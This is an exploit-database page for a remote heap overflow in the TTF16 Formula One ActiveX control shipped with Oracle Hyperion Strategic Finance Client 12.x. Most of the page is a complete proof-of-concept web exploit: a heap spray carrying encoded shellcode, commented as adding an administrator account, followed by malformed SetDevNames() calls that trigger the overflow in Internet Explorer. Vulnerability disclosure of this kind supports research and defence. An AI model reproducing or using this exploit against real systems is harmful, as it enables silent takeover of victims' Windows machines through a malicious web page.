header-logo
Suggest Exploit
vendor:
Hyperion Strategic Finance Client
by:
Andrea Micalizzi aka rgod
7.5
CVSS
HIGH
Remote Heap Overflow
CWE
Product Name: Hyperion Strategic Finance Client
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Oracle Hyperion Strategic Finance Client 12.x Tidestone Formula One WorkBook OLE Control TTF16 (6.3.5 Build 1) SetDevNames() Remote Heap Overflow poc

This is a proof of concept exploit for a remote heap overflow vulnerability in the Oracle Hyperion Strategic Finance Client 12.x Tidestone Formula One WorkBook OLE Control TTF16 (6.3.5 Build 1). The vulnerability can be triggered by calling the SetDevNames() function. The exploit is 99% stable and does not require DEP (Data Execution Prevention) to be enabled. The vulnerability may also affect other products, but version 6.1 seems to be not vulnerable. More details about the exploit can be found at the provided link.

Mitigation:

Source

Exploit-DB raw data:

<!-- 
Oracle Hyperion Strategic Finance Client 12.x Tidestone Formula One 
WorkBook OLE Control TTF16 (6.3.5 Build 1) SetDevNames() Remote Heap Overflow poc
99% stable,IE-no-dep. I think this control can be carried by other products, 
however 6.1 seems not vulnerable
A copy of heapLib can be found here: http://retrogod.altervista.org/heapLib_js.html
ActiveX Settings:
Binary path: C:\WINDOWS\system32\TTF16.ocx
CLSID: {B0475003-7740-11D1-BDC3-0020AF9F8E6E}
ProgID: TTF161.TTF1.6
Safe for Scripting (IObjectSafety): True
Safe for Initialization (IObjectSafety): True

Andrea Micalizzi aka rgod
--!>
<!-- saved from url=(0014)about:internet --> 
<html>
<head>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<SCRIPT src="heapLib.js"></SCRIPT>
</head>
<body>
<object classid='clsid:B0475003-7740-11D1-BDC3-0020AF9F8E6E' id='obj' width=640 height=480/>
</object>
<SCRIPT>
var finalsize = 1200;
var final = '';
var heap = null;
var curr = 0;
function x() {	
  heap = new heapLib.ie(0x20000);
  var heapspray = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + //add Administrator, user: sun, pass: tzu
                     "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" +
                     "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" +
                     "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +
                     "%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c" +
                     "%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f" +
                     "%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b" +
                     "%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c" +
                     "%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871" +
                     "%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835" +
                     "%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b" +
                     "%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b" +
                     "%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34" +
                     "%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35" +
                     "%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550" +
                     "%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b" +
                     "%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c" +
                     "%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943" +
                     "%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370" +
                     "%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377" +
                     "%u7053%u426d%u6444%u756e%u5235%u3058%u6165%u4630" +
                     "%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265" +
                     "%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330" +
                     "%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574" +
                     "%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030" +
                     "%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f" +
                     "%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e" +
                     "%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242" +
                     "%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741" +
                     "%u7734%u4734%u4570");   
while(heapspray.length < 0x500) heapspray += unescape("%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606%u0606");
  var heapblock = heapspray;
  while(heapblock.length < 0x40000) heapblock += heapblock;
  final = heapblock.substring(2, 0x40000 - 0x21);
  if(curr < 120) {
  	spray();
  }
}

function spray() {
  if(curr < finalsize - 1) {
    for(var i = 0; i < 120; i++) {
      heap.alloc(final);
      curr++;
    }
    }  

}
</script>
<script language='javascript' defer=defer>
x();
var x ="";
for (m=0;m<90;m++){x = x  + unescape("%u0606%u0606");}
try{
    obj.SetDevNames(x,"",""); //don't touch
    obj.SetDevNames(x,x,"");
    obj.SetDevNames(x,x,x);
}
catch(e){
}
obj.SetDevNames(x,x,"");
</script>